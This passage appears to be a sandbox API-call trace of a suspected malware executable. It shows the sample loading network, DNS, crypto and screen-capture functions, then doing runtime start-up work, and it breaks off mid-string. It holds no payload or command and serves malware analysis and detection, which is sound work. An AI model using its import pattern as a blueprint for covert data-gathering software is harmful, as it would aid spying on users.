0x75223f21 [0027.542] GetProcAddress (hModule=0x75220000, lpProcName=0xca) returned 0x7522fd6b [0027.542] GetProcAddress (hModule=0x75220000, lpProcName=0xc9) returned 0x75224af8 [0027.542] GetProcAddress (hModule=0x75220000, lpProcName=0xc) returned 0x75225dee [0027.542] GetProcAddress (hModule=0x75220000, lpProcName=0x2) returned 0x75224642 [0027.542] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x74af0000 [0027.708] GetProcAddress (hModule=0x74af0000, lpProcName="GetAdaptersInfo") returned 0x74af9263 [0027.708] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0027.867] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0027.867] GetProcAddress (hModule=0x75bc0000, lpProcName=0xb) returned 0x75bc311b [0027.867] GetProcAddress (hModule=0x75bc0000, lpProcName=0x34) returned 0x75bd7673 [0027.867] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74a90000 [0027.994] GetProcAddress (hModule=0x74a90000, lpProcName="DnsFree") returned 0x74a9436b [0027.994] GetProcAddress (hModule=0x74a90000, lpProcName="DnsQuery_W") returned 0x74aa572c [0027.994] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0027.994] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0027.994] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75ad0000 [0027.994] GetProcAddress (hModule=0x75ad0000, lpProcName="DeleteObject") returned 0x75ae5689 [0027.995] GetProcAddress (hModule=0x75ad0000, lpProcName="GetObjectA") returned 0x75ae85d4 [0027.995] GetProcAddress (hModule=0x75ad0000, lpProcName="SelectObject") returned 0x75ae4f70 [0027.995] GetProcAddress (hModule=0x75ad0000, lpProcName="GetDeviceCaps") returned 0x75ae4de0 [0027.995] GetProcAddress (hModule=0x75ad0000, lpProcName="GetBitmapBits") returned 0x75aec155 [0027.995] GetProcAddress (hModule=0x75ad0000, lpProcName="BitBlt") returned 0x75ae5ea6 [0027.995] GetProcAddress (hModule=0x75ad0000, lpProcName="DeleteDC") returned 0x75ae58b3 [0027.995] GetProcAddress (hModule=0x75ad0000, lpProcName="CreateDCA") returned 0x75ae7bcc [0027.995] GetProcAddress (hModule=0x75ad0000, lpProcName="CreateCompatibleDC") returned 0x75ae54f4 [0027.995] GetProcAddress (hModule=0x75ad0000, lpProcName="CreateCompatibleBitmap") returned 0x75ae5f49 [0027.995] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x749d0000 [0028.149] GetProcAddress (hModule=0x749d0000, lpProcName="atexit") returned 0x749ec544 [0028.149] atexit (param_1=0x5b0920) returned 0 [0028.155] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18eda8 | out: lpSystemTimeAsFileTime=0x18eda8*(dwLowDateTime=0x119345d0, dwHighDateTime=0x1d5956a)) [0028.155] GetCurrentThreadId () returned 0x8f4 [0028.155] GetCurrentProcessId () returned 0x8f0 [0028.155] QueryPerformanceCounter (in: lpPerformanceCount=0x18eda0 | out: lpPerformanceCount=0x18eda0*=14835585907) returned 1 [0028.204] GetStartupInfoW (in: lpStartupInfo=0x18ed38 | out: lpStartupInfo=0x18ed38*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x76c33519, hStdOutput=0x7714fd35, hStdError=0x771b7daf)) [0028.215] GetProcessHeap () returned 0x6f0000 [0028.365] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0028.365] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0028.365] GetProcAddress (hModule=0x76c20000, lpProcName="FlsFree") returned 0x76c3359f [0028.365] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0028.365] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0028.365] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionEx") returned 0x76c34d28 [0028.365] GetProcAddress (hModule=0x76c20000, lpProcName="CreateEventExW") returned 0x76cb410b [0028.365] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSemaphoreExW") returned 0x76cb4195 [0028.365] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadStackGuarantee") returned 0x76c3d31f [0028.365] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThreadpoolTimer") returned 0x76c4ee7e [0028.365] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadpoolTimer") returned 0x7717441c [0028.366] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7719c50e [0028.366] GetProcAddress (hModule=0x76c20000, lpProcName="CloseThreadpoolTimer") returned 0x7719c381 [0028.366] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThreadpoolWait") returned 0x76c4f088 [0028.366] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadpoolWait") returned 0x771805d7 [0028.366] GetProcAddress (hModule=0x76c20000, lpProcName="CloseThreadpoolWait") returned 0x7719ca24 [0028.366] GetProcAddress (hModule=0x76c20000, lpProcName="FlushProcessWriteBuffers") returned 0x77150b8c [0028.366] GetProcAddress (hModule=0x76c20000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7720fde8 [0028.366] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessorNumber") returned 0x771a1e1d [0028.366] GetProcAddress (hModule=0x76c20000, lpProcName="GetLogicalProcessorInformation") returned 0x76cb4761 [0028.366] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSymbolicLinkW") returned 0x76cacd11 [0028.366] GetProcAddress (hModule=0x76c20000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0028.366] GetProcAddress (hModule=0x76c20000, lpProcName="EnumSystemLocalesEx") returned 0x76cb424f [0028.366] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringEx") returned 0x76cb46b1 [0028.366] GetProcAddress (hModule=0x76c20000, lpProcName="GetDateFormatEx") returned 0x76cc6676 [0028.367] GetProcAddress (hModule=0x76c20000, lpProcName="GetLocaleInfoEx") returned 0x76cb4751 [0028.367] GetProcAddress (hModule=0x76c20000, lpProcName="GetTimeFormatEx") returned 0x76cc65f1 [0028.367] GetProcAddress (hModule=0x76c20000, lpProcName="GetUserDefaultLocaleName") returned 0x76cb47c1 [0028.367] GetProcAddress (hModule=0x76c20000, lpProcName="IsValidLocaleName") returned 0x76cb47e1 [0028.367] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringEx") returned 0x76cb47f1 [0028.367] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentPackageId") returned 0x0 [0028.367] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount64") returned 0x76c4eee0 [0028.367] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0028.367] GetProcAddress (hModule=0x76c20000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0028.368] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x3bc) returned 0x711570 [0028.368] GetCurrentThreadId () returned 0x8f4 [0028.373] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x7078a8 [0028.373] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x800) returned 0x711938 [0028.373] GetStartupInfoW (in: lpStartupInfo=0x18ed08 | out: lpStartupInfo=0x18ed08*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0x6403c312, hStdError=0x58)) [0028.373] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0028.373] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0028.373] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0028.373] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe\" " [0028.373] GetEnvironmentStringsW () returned 0x712140* [0028.373] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xaca) returned 0x712c18 [0028.417] FreeEnvironmentStringsW (penv=0x712140) returned 1 [0028.422] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\penelop0611_2019-11-06_10-30.exe_.exe")) returned 0x4b [0028.422] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa0) returned 0x7136f0 [0028.422] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x98) returned 0x713798 [0028.422] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x3e) returned 0x7066b0 [0028.422] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x6c) returned 0x713838 [0028.422] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x6e) returned 0x7138b0 [0028.422] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x78) returned 0x7047f0 [0028.422] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x62) returned 0x713928 [0028.422] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x2e) returned 0x70d338 [0028.422] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x48) returned 0x709020 [0028.422] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x28) returned 0x70cca8 [0028.422] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1a) returned 0x7111f8 [0028.422] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x4a) returned 0x713998 [0028.422] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x72) returned 0x704870 [0028.422] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x30) returned 0x70d370 [0028.422] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x2e) returned 0x70d3a8 [0028.422] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1c) returned 0x711220 [0028.422] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0xd2) returned 0x7139f0 [0028.422] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x7c) returned 0x713ad0 [0028.422] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x36) returned 0x713b58 [0028.422] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x3a) returned 0x7066f8 [0028.422] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x90) returned 0x713b98 [0028.422] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x24) returned 0x70ccd8 [0028.422] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x30) returned 0x70d3e0 [0028.422] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x36) returned 0x713c30 [0028.422] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x48) returned 0x709070 [0028.422] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x52) returned 0x713c70 [0028.423] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x3c) returned 0x706740 [0028.423] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x82) returned 0x713cd0 [0028.423] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x2e) returned 0x70d418 [0028.423] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1e) returned 0x711248 [0028.423] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x2c) returned 0x70d450 [0028.423] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x54) returned 0x713d60 [0028.423] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x52) returned 0x713dc0 [0028.423] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x2a) returned 0x70d488 [0028.423] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x3c) returned 0x706788 [0028.423] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x54) returned 0x713e20 [0028.423] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x24) returned 0x70cd08 [0028.423] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x30) returned 0x70d4c0 [0028.423] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x8c) returned 0x713e80 [0028.423] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x712c18 | out: hHeap=0x6f0000) returned 1 [0028.480] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x800) returned 0x712140 [0028.485] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x80) returned 0x713f18 [0028.536] GetLastError () returned 0x0 [0028.537] SetLastError (dwErrCode=0x0) [0028.537] GetLastError () returned 0x0 [0028.537] SetLastError (dwErrCode=0x0) [0028.537] GetLastError () returned 0x0 [0028.537] SetLastError (dwErrCode=0x0) [0028.537] GetACP () returned 0x4e4 [0028.537] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x220) returned 0x712948 [0028.537] GetLastError () returned 0x0 [0028.537] SetLastError (dwErrCode=0x0) [0028.537] IsValidCodePage (CodePage=0x4e4) returned 1 [0028.537] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ecfc | out: lpCPInfo=0x18ecfc) returned 1 [0028.542] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18e7c4 | out: lpCPInfo=0x18e7c4) returned 1 [0028.548] GetLastError () returned 0x0 [0028.548] SetLastError (dwErrCode=0x0) [0028.548] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18ebd8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0028.553] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18ebd8, cbMultiByte=256, lpWideCharStr=0x18e548, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0028.553] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18e7d8 | out: lpCharType=0x18e7d8) returned 1 [0028.553] GetLastError () returned 0x0 [0028.553] SetLastError (dwErrCode=0x0) [0028.553] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18ebd8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0028.553] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18ebd8, cbMultiByte=256, lpWideCharStr=0x18e518, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0028.559] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0028.559] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e308, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0028.559] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18ead8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¢Â\x03d\x14í\x18", lpUsedDefaultChar=0x0) returned 256 [0028.559] GetLastError () returned 0x0 [0028.559] SetLastError (dwErrCode=0x0) [0028.559] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18ebd8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0028.559] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18ebd8, cbMultiByte=256, lpWideCharStr=0x18e528, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0028.559] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0028.559] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e318, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0028.559] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18e9d8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 